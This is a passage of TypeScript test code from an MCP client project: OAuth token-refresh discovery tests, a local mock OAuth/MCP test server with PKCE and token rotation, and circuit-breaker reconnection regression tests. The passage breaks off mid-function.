expect(fetchUrl.toString()).toBe('https://mcp.sentry.dev/oauth/token');
expect(fetchOptions).toEqual(expect.objectContaining({ method: 'POST' }));
expect(result.access_token).toBe('new-access-token');
});
it('falls back to /token when both path and origin discovery fail', async () => {
const metadata = {
serverName: 'sentry',
serverUrl: 'https://mcp.sentry.dev/mcp',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
grant_types: ['authorization_code', 'refresh_token'],
},
};
// Both path AND origin discovery return undefined
mockDiscoverAuthorizationServerMetadata
.mockResolvedValueOnce(undefined)
.mockResolvedValueOnce(undefined);
mockFetch.mockResolvedValueOnce({
ok: true,
json: async () => ({
access_token: 'new-access-token',
refresh_token: 'new-refresh-token',
expires_in: 3600,
}),
} as Response);
const result = await MCPOAuthHandler.refreshOAuthTokens(
'test-refresh-token',
metadata,
{},
{},
);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2);
// Falls back to /token relative to server URL origin
const [fetchUrl] = mockFetch.mock.calls[0];
expect(String(fetchUrl)).toBe('https://mcp.sentry.dev/token');
expect(result.access_token).toBe('new-access-token');
});
it('does not retry with origin when server URL has no path (root URL)', async () => {
const metadata = {
serverName: 'test-server',
serverUrl: 'https://auth.example.com/',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
},
};
// Root URL discovery fails — no retry
mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined);
mockFetch.mockResolvedValueOnce({
ok: true,
json: async () => ({ access_token: 'new-token', expires_in: 3600 }),
} as Response);
await MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {});
// Only one discovery attempt for a root URL
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(1);
});
it('retries with origin when path-based discovery throws', async () => {
const metadata = {
serverName: 'sentry',
serverUrl: 'https://mcp.sentry.dev/mcp',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
grant_types: ['authorization_code', 'refresh_token'],
},
};
const originMetadata = {
issuer: 'https://mcp.sentry.dev/',
authorization_endpoint: 'https://mcp.sentry.dev/oauth/authorize',
token_endpoint: 'https://mcp.sentry.dev/oauth/token',
token_endpoint_auth_methods_supported: ['client_secret_post'],
response_types_supported: ['code'],
} as AuthorizationServerMetadata;
// First call throws, second call succeeds
mockDiscoverAuthorizationServerMetadata
.mockRejectedValueOnce(new Error('Network error'))
.mockResolvedValueOnce(originMetadata);
mockFetch.mockResolvedValueOnce({
ok: true,
json: async () => ({
access_token: 'new-access-token',
refresh_token: 'new-refresh-token',
expires_in: 3600,
}),
} as Response);
const result = await MCPOAuthHandler.refreshOAuthTokens(
'test-refresh-token',
metadata,
{},
{},
);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2);
const [fetchUrl] = mockFetch.mock.calls[0];
expect(String(fetchUrl)).toBe('https://mcp.sentry.dev/oauth/token');
expect(result.access_token).toBe('new-access-token');
});
it('propagates the throw when root URL discovery throws', async () => {
const metadata = {
serverName: 'test-server',
serverUrl: 'https://auth.example.com/',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
},
};
mockDiscoverAuthorizationServerMetadata.mockRejectedValueOnce(
new Error('Discovery failed'),
);
await expect(
MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}),
).rejects.toThrow('Discovery failed');
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(1);
});
it('propagates the throw when both path and origin discovery throw', async () => {
const metadata = {
serverName: 'sentry',
serverUrl: 'https://mcp.sentry.dev/mcp',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
},
};
mockDiscoverAuthorizationServerMetadata
.mockRejectedValueOnce(new Error('Network error'))
.mockRejectedValueOnce(new Error('Origin also failed'));
await expect(
MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}),
).rejects.toThrow('Origin also failed');
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2);
});
});
}); });
}); });

View file

@ -0,0 +1,449 @@
import * as http from 'http';
import * as net from 'net';
import { randomUUID, createHash } from 'crypto';
import { z } from 'zod';
import { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
import { StreamableHTTPServerTransport } from '@modelcontextprotocol/sdk/server/streamableHttp.js';
import type { FlowState } from '~/flow/types';
import type { Socket } from 'net';
export class MockKeyv<T = unknown> {
private store: Map<string, FlowState<T>>;
constructor() {
this.store = new Map();
}
async get(key: string): Promise<FlowState<T> | undefined> {
return this.store.get(key);
}
async set(key: string, value: FlowState<T>, _ttl?: number): Promise<true> {
this.store.set(key, value);
return true;
}
async delete(key: string): Promise<boolean> {
return this.store.delete(key);
}
}
export function getFreePort(): Promise<number> {
return new Promise((resolve, reject) => {
const srv = net.createServer();
srv.listen(0, '127.0.0.1', () => {
const addr = srv.address() as net.AddressInfo;
srv.close((err) => (err ? reject(err) : resolve(addr.port)));
});
});
}
export function trackSockets(httpServer: http.Server): () => Promise<void> {
const sockets = new Set<Socket>();
httpServer.on('connection', (socket: Socket) => {
sockets.add(socket);
socket.once('close', () => sockets.delete(socket));
});
return () =>
new Promise<void>((resolve) => {
for (const socket of sockets) {
socket.destroy();
}
sockets.clear();
httpServer.close(() => resolve());
});
}
export interface OAuthTestServerOptions {
tokenTTLMs?: number;
issueRefreshTokens?: boolean;
refreshTokenTTLMs?: number;
rotateRefreshTokens?: boolean;
}
export interface OAuthTestServer {
url: string;
port: number;
close: () => Promise<void>;
issuedTokens: Set<string>;
tokenTTL: number;
tokenIssueTimes: Map<string, number>;
issuedRefreshTokens: Map<string, string>;
registeredClients: Map<string, { client_id: string; client_secret: string }>;
getAuthCode: () => Promise<string>;
}
async function readRequestBody(req: http.IncomingMessage): Promise<string> {
const chunks: Uint8Array[] = [];
for await (const chunk of req) {
chunks.push(chunk as Uint8Array);
}
return Buffer.concat(chunks).toString();
}
function parseTokenRequest(body: string, contentType: string | undefined): URLSearchParams | null {
if (contentType?.includes('application/x-www-form-urlencoded')) {
return new URLSearchParams(body);
}
if (contentType?.includes('application/json')) {
const json = JSON.parse(body) as Record<string, string>;
return new URLSearchParams(json);
}
return new URLSearchParams(body);
}
export async function createOAuthMCPServer(
options: OAuthTestServerOptions = {},
): Promise<OAuthTestServer> {
const {
tokenTTLMs = 60000,
issueRefreshTokens = false,
refreshTokenTTLMs = 365 * 24 * 60 * 60 * 1000,
rotateRefreshTokens = false,
} = options;
const sessions = new Map<string, StreamableHTTPServerTransport>();
const issuedTokens = new Set<string>();
const tokenIssueTimes = new Map<string, number>();
const issuedRefreshTokens = new Map<string, string>();
const refreshTokenIssueTimes = new Map<string, number>();
const authCodes = new Map<string, { codeChallenge?: string; codeChallengeMethod?: string }>();
const registeredClients = new Map<string, { client_id: string; client_secret: string }>();
let port = 0;
const httpServer = http.createServer(async (req, res) => {
const url = new URL(req.url ?? '/', `http://${req.headers.host}`);
if (url.pathname === '/.well-known/oauth-authorization-server' && req.method === 'GET') {
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(
JSON.stringify({
issuer: `http://127.0.0.1:${port}`,
authorization_endpoint: `http://127.0.0.1:${port}/authorize`,
token_endpoint: `http://127.0.0.1:${port}/token`,
registration_endpoint: `http://127.0.0.1:${port}/register`,
response_types_supported: ['code'],
grant_types_supported: issueRefreshTokens
? ['authorization_code', 'refresh_token']
: ['authorization_code'],
token_endpoint_auth_methods_supported: ['client_secret_basic', 'client_secret_post'],
code_challenge_methods_supported: ['S256'],
}),
);
return;
}
if (url.pathname === '/register' && req.method === 'POST') {
const body = await readRequestBody(req);
const data = JSON.parse(body) as { redirect_uris?: string[] };
const clientId = `client-${randomUUID().slice(0, 8)}`;
const clientSecret = `secret-${randomUUID()}`;
registeredClients.set(clientId, { client_id: clientId, client_secret: clientSecret });
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(
JSON.stringify({
client_id: clientId,
client_secret: clientSecret,
redirect_uris: data.redirect_uris ?? [],
}),
);
return;
}
if (url.pathname === '/authorize') {
const code = randomUUID();
const codeChallenge = url.searchParams.get('code_challenge') ?? undefined;
const codeChallengeMethod = url.searchParams.get('code_challenge_method') ?? undefined;
authCodes.set(code, { codeChallenge, codeChallengeMethod });
const redirectUri = url.searchParams.get('redirect_uri') ?? '';
const state = url.searchParams.get('state') ?? '';
res.writeHead(302, {
Location: `${redirectUri}?code=${code}&state=${state}`,
});
res.end();
return;
}
if (url.pathname === '/token' && req.method === 'POST') {
const body = await readRequestBody(req);
const params = parseTokenRequest(body, req.headers['content-type']);
if (!params) {
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_request' }));
return;
}
const grantType = params.get('grant_type');
if (grantType === 'authorization_code') {
const code = params.get('code');
const codeData = code ? authCodes.get(code) : undefined;
if (!code || !codeData) {
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_grant' }));
return;
}
if (codeData.codeChallenge) {
const codeVerifier = params.get('code_verifier');
if (!codeVerifier) {
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_grant' }));
return;
}
if (codeData.codeChallengeMethod === 'S256') {
const expected = createHash('sha256').update(codeVerifier).digest('base64url');
if (expected !== codeData.codeChallenge) {
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_grant' }));
return;
}
}
}
authCodes.delete(code);
const accessToken = randomUUID();
issuedTokens.add(accessToken);
tokenIssueTimes.set(accessToken, Date.now());
const tokenResponse: Record<string, string | number> = {
access_token: accessToken,
token_type: 'Bearer',
expires_in: Math.ceil(tokenTTLMs / 1000),
};
if (issueRefreshTokens) {
const refreshToken = randomUUID();
issuedRefreshTokens.set(refreshToken, accessToken);
refreshTokenIssueTimes.set(refreshToken, Date.now());
tokenResponse.refresh_token = refreshToken;
}
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(JSON.stringify(tokenResponse));
return;
}
if (grantType === 'refresh_token' && issueRefreshTokens) {
const refreshToken = params.get('refresh_token');
if (!refreshToken || !issuedRefreshTokens.has(refreshToken)) {
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_grant' }));
return;
}
const issueTime = refreshTokenIssueTimes.get(refreshToken) ?? 0;
if (Date.now() - issueTime > refreshTokenTTLMs) {
issuedRefreshTokens.delete(refreshToken);
refreshTokenIssueTimes.delete(refreshToken);
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_grant' }));
return;
}
const newAccessToken = randomUUID();
issuedTokens.add(newAccessToken);
tokenIssueTimes.set(newAccessToken, Date.now());
const tokenResponse: Record<string, string | number> = {
access_token: newAccessToken,
token_type: 'Bearer',
expires_in: Math.ceil(tokenTTLMs / 1000),
};
if (rotateRefreshTokens) {
issuedRefreshTokens.delete(refreshToken);
refreshTokenIssueTimes.delete(refreshToken);
const newRefreshToken = randomUUID();
issuedRefreshTokens.set(newRefreshToken, newAccessToken);
refreshTokenIssueTimes.set(newRefreshToken, Date.now());
tokenResponse.refresh_token = newRefreshToken;
}
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(JSON.stringify(tokenResponse));
return;
}
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'unsupported_grant_type' }));
return;
}
// All other paths require Bearer token auth
const authHeader = req.headers.authorization;
if (!authHeader || !authHeader.startsWith('Bearer ')) {
res.writeHead(401, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_token' }));
return;
}
const token = authHeader.slice(7);
if (!issuedTokens.has(token)) {
res.writeHead(401, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_token' }));
return;
}
const issueTime = tokenIssueTimes.get(token) ?? 0;
if (Date.now() - issueTime > tokenTTLMs) {
issuedTokens.delete(token);
tokenIssueTimes.delete(token);
res.writeHead(401, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_token' }));
return;
}
// Authenticated MCP request — route to transport
const sid = req.headers['mcp-session-id'] as string | undefined;
let transport = sid ? sessions.get(sid) : undefined;
if (!transport) {
transport = new StreamableHTTPServerTransport({
sessionIdGenerator: () => randomUUID(),
});
const mcp = new McpServer({ name: 'oauth-test-server', version: '0.0.1' });
mcp.tool('echo', { message: z.string() }, async (args) => ({
content: [{ type: 'text' as const, text: `echo: ${args.message}` }],
}));
await mcp.connect(transport);
}
await transport.handleRequest(req, res);
if (transport.sessionId && !sessions.has(transport.sessionId)) {
sessions.set(transport.sessionId, transport);
transport.onclose = () => sessions.delete(transport!.sessionId!);
}
});
const destroySockets = trackSockets(httpServer);
port = await getFreePort();
await new Promise<void>((resolve) => httpServer.listen(port, '127.0.0.1', resolve));
return {
url: `http://127.0.0.1:${port}/`,
port,
issuedTokens,
tokenTTL: tokenTTLMs,
tokenIssueTimes,
issuedRefreshTokens,
registeredClients,
getAuthCode: async () => {
const authRes = await fetch(
`http://127.0.0.1:${port}/authorize?redirect_uri=http://localhost&state=test`,
{ redirect: 'manual' },
);
const location = authRes.headers.get('location') ?? '';
return new URL(location).searchParams.get('code') ?? '';
},
close: async () => {
const closing = [...sessions.values()].map((t) => t.close().catch(() => undefined));
sessions.clear();
await Promise.all(closing);
await destroySockets();
},
};
}
export interface InMemoryToken {
userId: string;
type: string;
identifier: string;
token: string;
expiresAt: Date;
createdAt: Date;
metadata?: Map<string, unknown> | Record<string, unknown>;
}
export class InMemoryTokenStore {
private tokens: Map<string, InMemoryToken> = new Map();
private key(filter: { userId?: string; type?: string; identifier?: string }): string {
return `${filter.userId}:${filter.type}:${filter.identifier}`;
}
findToken = async (filter: {
userId?: string;
type?: string;
identifier?: string;
}): Promise<InMemoryToken | null> => {
for (const token of this.tokens.values()) {
const matchUserId = !filter.userId || token.userId === filter.userId;
const matchType = !filter.type || token.type === filter.type;
const matchIdentifier = !filter.identifier || token.identifier === filter.identifier;
if (matchUserId && matchType && matchIdentifier) {
return token;
}
}
return null;
};
createToken = async (data: {
userId: string;
type: string;
identifier: string;
token: string;
expiresIn?: number;
metadata?: Record<string, unknown>;
}): Promise<InMemoryToken> => {
const expiresIn = data.expiresIn ?? 365 * 24 * 60 * 60;
const token: InMemoryToken = {
userId: data.userId,
type: data.type,
identifier: data.identifier,
token: data.token,
expiresAt: new Date(Date.now() + expiresIn * 1000),
createdAt: new Date(),
metadata: data.metadata,
};
this.tokens.set(this.key(data), token);
return token;
};
updateToken = async (
filter: { userId?: string; type?: string; identifier?: string },
data: {
userId?: string;
type?: string;
identifier?: string;
token?: string;
expiresIn?: number;
metadata?: Record<string, unknown>;
},
): Promise<InMemoryToken> => {
const existing = await this.findToken(filter);
if (!existing) {
throw new Error(`Token not found for filter: ${JSON.stringify(filter)}`);
}
const existingKey = this.key(existing);
const expiresIn =
data.expiresIn ?? Math.floor((existing.expiresAt.getTime() - Date.now()) / 1000);
const updated: InMemoryToken = {
...existing,
token: data.token ?? existing.token,
expiresAt: data.expiresIn ? new Date(Date.now() + expiresIn * 1000) : existing.expiresAt,
metadata: data.metadata ?? existing.metadata,
};
this.tokens.set(existingKey, updated);
return updated;
};
deleteToken = async (filter: {
userId: string;
type: string;
identifier: string;
}): Promise<void> => {
this.tokens.delete(this.key(filter));
};
getAll(): InMemoryToken[] {
return [...this.tokens.values()];
}
clear(): void {
this.tokens.clear();
}
}

View file

@ -0,0 +1,668 @@
/**
* Reconnection storm regression tests for PR #12162.
*
* Validates circuit breaker, throttling, cooldown, and timeout fixes using real
* MCP SDK transports (no mocked stubs). A real StreamableHTTP server is spun up
* per test suite and MCPConnection talks to it through a genuine HTTP stack.
*/
import http from 'http';
import { randomUUID } from 'crypto';
import express from 'express';
import { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
import { isInitializeRequest } from '@modelcontextprotocol/sdk/types.js';
import { StreamableHTTPServerTransport } from '@modelcontextprotocol/sdk/server/streamableHttp.js';
import type { Socket } from 'net';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import type { MCPOAuthTokens } from '~/mcp/oauth';
import { OAuthReconnectionTracker } from '~/mcp/oauth/OAuthReconnectionTracker';
import { createOAuthMCPServer } from './helpers/oauthTestServer';
import { MCPConnection } from '~/mcp/connection';
import { mcpConfig } from '~/mcp/mcpConfig';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
}));
/* ------------------------------------------------------------------ */
/* Helpers */
/* ------------------------------------------------------------------ */
interface TestServer {
url: string;
httpServer: http.Server;
close: () => Promise<void>;
}
function trackSockets(httpServer: http.Server): () => Promise<void> {
const sockets = new Set<Socket>();
httpServer.on('connection', (socket: Socket) => {
sockets.add(socket);
socket.once('close', () => sockets.delete(socket));
});
return () =>
new Promise<void>((resolve) => {
for (const socket of sockets) {
socket.destroy();
}
sockets.clear();
httpServer.close(() => resolve());
});
}
function startMCPServer(): Promise<TestServer> {
const app = express();
app.use(express.json());
const transports: Record<string, StreamableHTTPServerTransport> = {};
function createServer(): McpServer {
const server = new McpServer({ name: 'test-server', version: '1.0.0' });
server.tool('echo', 'echoes input', { message: { type: 'string' } as never }, async (args) => {
const msg = (args as Record<string, string>).message ?? '';
return { content: [{ type: 'text', text: msg }] };
});
return server;
}
app.all('/mcp', async (req, res) => {
const sessionId = req.headers['mcp-session-id'] as string | undefined;
if (sessionId && transports[sessionId]) {
await transports[sessionId].handleRequest(req, res, req.body);
return;
}
if (!sessionId && isInitializeRequest(req.body)) {
const transport = new StreamableHTTPServerTransport({
sessionIdGenerator: () => randomUUID(),
onsessioninitialized: (sid) => {
transports[sid] = transport;
},
});
transport.onclose = () => {
const sid = transport.sessionId;
if (sid) {
delete transports[sid];
}
};
const server = createServer();
await server.connect(transport);
await transport.handleRequest(req, res, req.body);
return;
}
if (req.method === 'GET') {
res.status(404).send('Not Found');
return;
}
res.status(400).json({
jsonrpc: '2.0',
error: { code: -32000, message: 'Bad Request: No valid session ID provided' },
id: null,
});
});
return new Promise((resolve) => {
const httpServer = app.listen(0, '127.0.0.1', () => {
const destroySockets = trackSockets(httpServer);
const addr = httpServer.address() as { port: number };
resolve({
url: `http://127.0.0.1:${addr.port}/mcp`,
httpServer,
close: async () => {
for (const t of Object.values(transports)) {
t.close().catch(() => {});
}
await destroySockets();
},
});
});
});
}
function createConnection(serverName: string, url: string, initTimeout = 5000): MCPConnection {
return new MCPConnection({
serverName,
serverConfig: { url, type: 'streamable-http', initTimeout } as never,
});
}
async function teardownConnection(conn: MCPConnection): Promise<void> {
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = true;
conn.removeAllListeners();
await conn.disconnect();
}
afterEach(() => {
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(MCPConnection as any).circuitBreakers.clear();
});
/* ------------------------------------------------------------------ */
/* Fix #2 — Circuit breaker trips after rapid connect/disconnect */
/* cycles (CB_MAX_CYCLES within window -> cooldown) */
/* ------------------------------------------------------------------ */
describe('Fix #2: Circuit breaker stops rapid reconnect cycling', () => {
it('blocks connection after CB_MAX_CYCLES rapid cycles via static circuit breaker', async () => {
const srv = await startMCPServer();
const conn = createConnection('cycling-server', srv.url);
let completedCycles = 0;
let breakerMessage = '';
const maxAttempts = mcpConfig.CB_MAX_CYCLES * 2;
for (let cycle = 0; cycle < maxAttempts; cycle++) {
try {
await conn.connect();
await teardownConnection(conn);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = false;
completedCycles++;
} catch (e) {
breakerMessage = (e as Error).message;
break;
}
}
expect(breakerMessage).toContain('Circuit breaker is open');
expect(completedCycles).toBeLessThanOrEqual(mcpConfig.CB_MAX_CYCLES);
await srv.close();
});
});
/* ------------------------------------------------------------------ */
/* Fix #3 — SSE 400/405 handled in same branch as 404 */
/* ------------------------------------------------------------------ */
describe('Fix #3: SSE 400/405 handled in same branch as 404', () => {
it('400 with active session triggers reconnection (session lost)', async () => {
const srv = await startMCPServer();
const conn = createConnection('sse-400', srv.url);
await conn.connect();
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = true;
const changes: string[] = [];
conn.on('connectionChange', (s: string) => changes.push(s));
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const transport = (conn as any).transport;
transport.onerror({ message: 'Failed to open SSE stream', code: 400 });
expect(changes).toContain('error');
await teardownConnection(conn);
await srv.close();
});
it('405 with active session triggers reconnection (session lost)', async () => {
const srv = await startMCPServer();
const conn = createConnection('sse-405', srv.url);
await conn.connect();
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = true;
const changes: string[] = [];
conn.on('connectionChange', (s: string) => changes.push(s));
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const transport = (conn as any).transport;
transport.onerror({ message: 'Method Not Allowed', code: 405 });
expect(changes).toContain('error');
await teardownConnection(conn);
await srv.close();
});
});
/* ------------------------------------------------------------------ */
/* Fix #4 — Circuit breaker state persists in static Map across */
/* instance replacements */
/* ------------------------------------------------------------------ */
describe('Fix #4: Circuit breaker state persists across instance replacement', () => {
it('new MCPConnection for same serverName inherits breaker state from static Map', async () => {
const srv = await startMCPServer();
const conn1 = createConnection('replace', srv.url);
await conn1.connect();
await teardownConnection(conn1);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cbAfterConn1 = (MCPConnection as any).circuitBreakers.get('replace');
expect(cbAfterConn1).toBeDefined();
const cyclesAfterConn1 = cbAfterConn1.cycleCount;
expect(cyclesAfterConn1).toBeGreaterThan(0);
const conn2 = createConnection('replace', srv.url);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cbFromConn2 = (conn2 as any).getCircuitBreaker();
expect(cbFromConn2.cycleCount).toBe(cyclesAfterConn1);
await teardownConnection(conn2);
await srv.close();
});
it('clearCooldown resets static state so explicit retry proceeds', () => {
const conn = createConnection('replace', 'http://127.0.0.1:1/mcp');
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cb = (conn as any).getCircuitBreaker();
cb.cooldownUntil = Date.now() + 999_999;
// eslint-disable-next-line @typescript-eslint/no-explicit-any
expect((conn as any).isCircuitOpen()).toBe(true);
MCPConnection.clearCooldown('replace');
// eslint-disable-next-line @typescript-eslint/no-explicit-any
expect((conn as any).isCircuitOpen()).toBe(false);
});
});
/* ------------------------------------------------------------------ */
/* Fix #5 — Dead servers now trigger circuit breaker via */
/* recordFailedRound() in the catch path */
/* ------------------------------------------------------------------ */
describe('Fix #5: Dead server triggers circuit breaker', () => {
it('failures trigger backoff, blocking subsequent attempts before they reach the SDK', async () => {
const conn = createConnection('dead', 'http://127.0.0.1:1/mcp', 1000);
const spy = jest.spyOn(conn.client, 'connect');
const totalAttempts = mcpConfig.CB_MAX_FAILED_ROUNDS + 2;
const errors: string[] = [];
for (let i = 0; i < totalAttempts; i++) {
try {
await conn.connect();
} catch (e) {
errors.push((e as Error).message);
}
}
expect(spy.mock.calls.length).toBe(mcpConfig.CB_MAX_FAILED_ROUNDS);
expect(errors).toHaveLength(totalAttempts);
expect(errors.filter((m) => m.includes('Circuit breaker is open'))).toHaveLength(2);
await conn.disconnect();
});
it('user B is immediately blocked when user A already tripped the breaker for the same server', async () => {
const deadUrl = 'http://127.0.0.1:1/mcp';
const userA = new MCPConnection({
serverName: 'shared-dead',
serverConfig: { url: deadUrl, type: 'streamable-http', initTimeout: 1000 } as never,
userId: 'user-A',
});
for (let i = 0; i < mcpConfig.CB_MAX_FAILED_ROUNDS; i++) {
try {
await userA.connect();
} catch {
// expected
}
}
const userB = new MCPConnection({
serverName: 'shared-dead',
serverConfig: { url: deadUrl, type: 'streamable-http', initTimeout: 1000 } as never,
userId: 'user-B',
});
const spyB = jest.spyOn(userB.client, 'connect');
let blockedMessage = '';
try {
await userB.connect();
} catch (e) {
blockedMessage = (e as Error).message;
}
expect(blockedMessage).toContain('Circuit breaker is open');
expect(spyB).toHaveBeenCalledTimes(0);
await userA.disconnect();
await userB.disconnect();
});
it('clearCooldown after user retry unblocks all users', async () => {
const deadUrl = 'http://127.0.0.1:1/mcp';
const userA = new MCPConnection({
serverName: 'shared-dead-clear',
serverConfig: { url: deadUrl, type: 'streamable-http', initTimeout: 1000 } as never,
userId: 'user-A',
});
for (let i = 0; i < mcpConfig.CB_MAX_FAILED_ROUNDS; i++) {
try {
await userA.connect();
} catch {
// expected
}
}
const userB = new MCPConnection({
serverName: 'shared-dead-clear',
serverConfig: { url: deadUrl, type: 'streamable-http', initTimeout: 1000 } as never,
userId: 'user-B',
});
try {
await userB.connect();
} catch (e) {
expect((e as Error).message).toContain('Circuit breaker is open');
}
MCPConnection.clearCooldown('shared-dead-clear');
const spyB = jest.spyOn(userB.client, 'connect');
try {
await userB.connect();
} catch {
// expected — server is still dead
}
expect(spyB).toHaveBeenCalledTimes(1);
await userA.disconnect();
await userB.disconnect();
});
});
/* ------------------------------------------------------------------ */
/* Fix #5b — disconnect(false) preserves cycle tracking */
/* ------------------------------------------------------------------ */
describe('Fix #5b: disconnect(false) preserves cycle tracking', () => {
it('connect() passes false to disconnect, which calls recordCycle()', async () => {
const srv = await startMCPServer();
const conn = createConnection('wipe', srv.url);
const spy = jest.spyOn(conn, 'disconnect');
await conn.connect();
expect(spy).toHaveBeenCalledWith(false);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cb = (MCPConnection as any).circuitBreakers.get('wipe');
expect(cb).toBeDefined();
expect(cb.cycleCount).toBeGreaterThan(0);
await teardownConnection(conn);
await srv.close();
});
});
/* ------------------------------------------------------------------ */
/* Fix #6 — OAuth failure uses cooldown-based retry */
/* ------------------------------------------------------------------ */
describe('Fix #6: OAuth failure uses cooldown-based retry', () => {
beforeEach(() => jest.useFakeTimers());
afterEach(() => jest.useRealTimers());
it('isFailed expires after first cooldown of 5 min', () => {
jest.setSystemTime(Date.now());
const tracker = new OAuthReconnectionTracker();
tracker.setFailed('u1', 'srv');
expect(tracker.isFailed('u1', 'srv')).toBe(true);
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
});
it('progressive cooldown: 5m, 10m, 20m, 30m (capped)', () => {
jest.setSystemTime(Date.now());
const tracker = new OAuthReconnectionTracker();
tracker.setFailed('u1', 'srv');
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
tracker.setFailed('u1', 'srv');
jest.advanceTimersByTime(10 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
tracker.setFailed('u1', 'srv');
jest.advanceTimersByTime(20 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
tracker.setFailed('u1', 'srv');
jest.advanceTimersByTime(29 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(true);
jest.advanceTimersByTime(1 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
});
it('removeFailed resets attempt count so next failure starts at 5m', () => {
jest.setSystemTime(Date.now());
const tracker = new OAuthReconnectionTracker();
tracker.setFailed('u1', 'srv');
tracker.setFailed('u1', 'srv');
tracker.setFailed('u1', 'srv');
tracker.removeFailed('u1', 'srv');
tracker.setFailed('u1', 'srv');
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
});
});
/* ------------------------------------------------------------------ */
/* Integration: Circuit breaker caps rapid cycling with real transport */
/* ------------------------------------------------------------------ */
describe('Cascade: Circuit breaker caps rapid cycling', () => {
it('breaker trips before double CB_MAX_CYCLES complete against a live server', async () => {
const srv = await startMCPServer();
const conn = createConnection('cascade', srv.url);
const spy = jest.spyOn(conn.client, 'connect');
let completedCycles = 0;
const maxAttempts = mcpConfig.CB_MAX_CYCLES * 2;
for (let i = 0; i < maxAttempts; i++) {
try {
await conn.connect();
await teardownConnection(conn);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = false;
completedCycles++;
} catch (e) {
if ((e as Error).message.includes('Circuit breaker is open')) {
break;
}
throw e;
}
}
expect(completedCycles).toBeLessThanOrEqual(mcpConfig.CB_MAX_CYCLES);
expect(spy.mock.calls.length).toBeLessThanOrEqual(mcpConfig.CB_MAX_CYCLES);
await srv.close();
});
it('breaker bounds failures against a killed server', async () => {
const srv = await startMCPServer();
const conn = createConnection('cascade-die', srv.url, 2000);
await conn.connect();
await teardownConnection(conn);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = false;
await srv.close();
let breakerTripped = false;
for (let i = 0; i < 10; i++) {
try {
await conn.connect();
} catch (e) {
if ((e as Error).message.includes('Circuit breaker is open')) {
breakerTripped = true;
break;
}
}
}
expect(breakerTripped).toBe(true);
}, 30_000);
});
/* ------------------------------------------------------------------ */
/* OAuth: cycle recovery after successful OAuth reconnect */
/* ------------------------------------------------------------------ */
describe('OAuth: cycle budget recovery after successful OAuth', () => {
let oauthServer: OAuthTestServer;
beforeEach(async () => {
oauthServer = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
afterEach(async () => {
await oauthServer.close();
});
async function exchangeCodeForToken(serverUrl: string): Promise<string> {
const authRes = await fetch(`${serverUrl}authorize?redirect_uri=http://localhost&state=test`, {
redirect: 'manual',
});
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code') ?? '';
const tokenRes = await fetch(`${serverUrl}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
